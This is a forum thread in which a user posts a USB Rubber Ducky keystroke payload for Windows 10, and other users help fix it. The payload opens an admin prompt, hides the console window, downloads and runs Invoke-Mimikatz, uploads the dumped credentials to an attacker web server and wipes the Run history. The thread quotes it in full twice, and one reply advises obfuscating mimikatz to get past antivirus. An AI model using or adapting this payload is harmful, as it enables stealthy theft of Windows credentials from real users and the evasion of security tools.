Jump to content

Windows 10 password grab.


Mr.X
 Share

Recommended Posts

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):

DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

Link to comment
Share on other sites

  • 2 weeks later...

Why would you netcat if you use the rx.php script?
Just look into the web directory where rx.php is located and there should be all the files created by the script.
Tip: Check the apache error log, in my case the use apache runs with (www-data) didn't have write permissions in this folder and thus the rx.php couldn't create files.

Link to comment
Share on other sites

  • 4 weeks later...
  • 1 month later...
  • 2 weeks later...
  • 3 years later...
On 12/10/2016 at 4:09 PM, Mr.X said:

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):




DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?

Does mimikatz work if there's an anti-virus installed on the computer or it still works?

Link to comment
Share on other sites

On 12/8/2020 at 8:10 AM, ehsan123 said:

Does mimikatz work if there's an anti-virus installed on the computer or it still works?

Probably not by default. You'd have to obfuscate it first.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...